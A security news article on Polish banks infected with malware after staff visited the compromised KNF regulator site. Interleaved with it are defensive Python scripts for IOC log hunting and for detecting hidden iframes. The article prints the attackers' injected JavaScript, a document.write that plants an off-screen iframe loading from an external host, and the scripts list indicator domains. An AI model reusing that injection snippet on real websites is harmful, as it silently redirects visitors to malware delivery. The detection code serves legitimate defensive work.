
Crooks hacked Polish banks with malware planted on a government site

Several Polish banks confirmed that their systems were infected with malware after their staff visited the website of the Polish Financial Supervision Authority.

Polish banks are investigating a large-scale cyber attack after malware was spotted on several servers of the financial institutions.

The cyber attack was first reported last Friday by Zaufana Trzecia Strona, a Polish security news site.

The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that the regulator's internal systems had been compromised by hackers "from another country". The attackers planted on the regulator's servers the malicious files that were then used in the attacks against the Polish banks.

To stop the malware from spreading further, the authorities decided to shut down the entire network at the KNF "in order to secure evidence."

The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

The IT staff at the banks noticed anomalous traffic associated with the presence of executables on several servers.

"It has been a busy week in SOCs all over the Polish financial sector. At least a few of Poland's 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble," reported the badcyber.com website. "A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise, it managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive."
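The IOC sweep described above (banks querying their SIEMs for traffic to indicator domains) is easy to get subtly wrong: matching on substrings lets a look-alike domain slip through, and CONNECT entries for HTTPS carry a host:port rather than a URL. The script below is an added example, not code from the article or from badcyber.com. It assumes squid-style proxy access logs; the log lines are constructed for the example, the only indicator taken from the article is the sap.misapor.ch host seen in the injected script, and the second IOC entry is a placeholder standing in for a real feed.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# sap.misapor.ch is the host in the script injected into the KNF site.
# example-c2.invalid is a constructed placeholder for further feed entries.
IOC_DOMAINS = {"sap.misapor.ch", "example-c2.invalid"}

# Constructed squid-style access log lines (not taken from any real bank):
# timestamp elapsed client action/code bytes method url user hierarchy/peer type
SAMPLE_LOG = """\
1486150001.123    312 10.20.30.41 TCP_MISS/200 5120 GET http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11 - HIER_DIRECT/1.2.3.4 application/javascript
1486150002.456    890 10.20.30.41 TCP_MISS/200 1730 GET https://sap.misapor.ch/vishop/view.jsp?pagenum=1 - HIER_DIRECT/5.6.7.8 text/html
1486150003.789     55 10.20.30.42 TCP_MISS/200 2048 CONNECT sap.misapor.ch:443 - HIER_DIRECT/5.6.7.8 -
1486150004.001     40 10.20.30.43 TCP_MISS/200 912 GET http://www.sap.misapor.ch.evil-lookalike.test/ - HIER_DIRECT/9.9.9.9 text/html
1486150005.002     10 10.20.30.44 TCP_MISS/200 600 GET http://cdn.example.org/lib.js - HIER_DIRECT/7.7.7.7 application/javascript
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)


def host_of(method, url):
    """Destination hostname; CONNECT lines carry 'host:port' instead of a URL."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0].lower()
    return (urlparse(url).hostname or "").lower()


def matches_ioc(host, iocs=IOC_DOMAINS):
    """Exact or parent-domain match on DNS labels.

    x.sap.misapor.ch hits; www.sap.misapor.ch.evil-lookalike.test does not,
    which a naive 'indicator in host' substring test would get wrong.
    """
    labels = host.split(".")
    return any(".".join(labels[i:]) in iocs for i in range(len(labels)))


def hunt(log_text, iocs=IOC_DOMAINS):
    """Return {client_ip: {'hits', 'first_seen', 'hosts'}} for clients that touched an IOC."""
    hits = defaultdict(lambda: {"hits": 0, "first_seen": None, "hosts": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        host = host_of(m["method"], m["url"])
        if host and matches_ioc(host, iocs):
            rec = hits[m["client"]]
            rec["hits"] += 1
            rec["hosts"].add(host)
            ts = float(m["ts"])
            if rec["first_seen"] is None or ts < rec["first_seen"]:
                rec["first_seen"] = ts
    return dict(hits)


if __name__ == "__main__":
    for client, rec in sorted(hunt(SAMPLE_LOG).items()):
        print(client, rec["hits"], rec["first_seen"], sorted(rec["hosts"]))
```

Two of the five constructed clients are reported: one that fetched the iframe URL over plain HTTP and one whose only trace is a CONNECT tunnel to the host on port 443. The look-alike domain that merely contains the indicator as a substring is not reported.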

According to the first findings of the investigation, the attackers compromised the KNF's website and modified one of the site's JavaScript files.

Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.

Visitors to the KNF website who loaded the modified file were made to fetch an external JavaScript file, which in turn downloaded the malware from an external server and installed it.

The unauthorized code was stored in the following file:

http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11

and looked like this:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;'></iframe></div>");
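The injection above is a textbook hidden iframe: a zero-size div wrapping a frame positioned 2144 pixels off the left edge of the page, pointing at a third-party host. The script below is an added example, not code from the article or from the KNF investigation. It extracts the HTML fragments handed to document.write() in a JavaScript file, parses them, and flags any iframe that is hidden (off-screen, collapsed, or display:none) or that points at a host outside an allowlist; the allowlist of KNF hostnames is an assumption made for the example, and the snippet it runs on is the one quoted in the article with its extraction line breaks rejoined.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# The snippet quoted in the article, with the line breaks from extraction removed.
INJECTED_JS = (
    "document.write(\"<div id='efHpTk' width='0px' height='0px'><iframe name='forma' "
    "src='https://sap.misapor.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' "
    "style='left:-2144px;position:absolute;top:0px;'></iframe></div>\");"
)

# Hosts the site is expected to frame content from (assumption for this example).
ALLOWED_HOSTS = {"www.knf.gov.pl", "knf.gov.pl"}

# The string literal passed to document.write(...), either quote style, simple escapes.
DOCWRITE_RE = re.compile(r"""document\.write\(\s*(["'])((?:\\.|(?!\1).)*)\1\s*\)""", re.S)


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def parse_style(style):
    """'left:-2144px;position:absolute' -> {'left': '-2144px', 'position': 'absolute'}"""
    out = {}
    for decl in style.split(";"):
        if ":" in decl:
            key, value = decl.split(":", 1)
            out[key.strip().lower()] = value.strip().lower()
    return out


def _px(value):
    """Leading numeric part of a CSS length ('-2144px' -> -2144.0), or None."""
    m = re.match(r"-?\d+(\.\d+)?", value or "")
    return float(m.group()) if m else None


def is_hidden(attrs):
    """True if the iframe is invisible, positioned far off-screen, or collapsed to ~0px."""
    style = parse_style(attrs.get("style", ""))
    if style.get("display") == "none" or style.get("visibility") == "hidden":
        return True
    for side in ("left", "top"):
        offset = _px(style.get(side))
        if offset is not None and offset < -100:
            return True
    width, height = _px(attrs.get("width")), _px(attrs.get("height"))
    return (width is not None and width <= 1) or (height is not None and height <= 1)


def find_suspicious_iframes(js_source, allowed_hosts=ALLOWED_HOSTS):
    """Return [(src, [reasons])] for every document.write'd iframe that is hidden
    or framed from a host outside the allowlist."""
    findings = []
    for m in DOCWRITE_RE.finditer(js_source):
        fragment = m.group(2).replace('\\"', '"').replace("\\'", "'")
        collector = IframeCollector()
        collector.feed(fragment)
        for attrs in collector.iframes:
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            reasons = []
            if is_hidden(attrs):
                reasons.append("hidden")
            if host and host not in allowed_hosts:
                reasons.append("external-host:" + host)
            if reasons:
                findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(INJECTED_JS):
        print(src, reasons)
```

Run against the quoted snippet this reports the sap.misapor.ch frame as both hidden and external. A visible iframe pointing at an allowlisted host produces no finding, so the check can run on every deploy of a site's static assets alongside a plain content-hash comparison against the last known-good build, which is what would have caught the modified accordian-src.js in the first place.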

At the time of writing, both the KNF and the Polish government confirmed that there is no indication that the crooks have stolen money from the banks.

"Significantly, so far we have no information about these attacks involving a successful or unsuccessful attempt to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money," reported the local media site zaufanatrzeciastrona.pl. "In at least one case, it is known that a large amount of data was transferred from the bank's network to external servers, but because the criminals encrypted the data before sending it, determining what was stolen may be difficult."

What is certain is that the incident could be considered the largest hack ever of the country's financial sector.

The IOCs are available on the badcyber.com website.


Pierluigi Paganini

(Security Affairs – Polish banks, cybercrime)
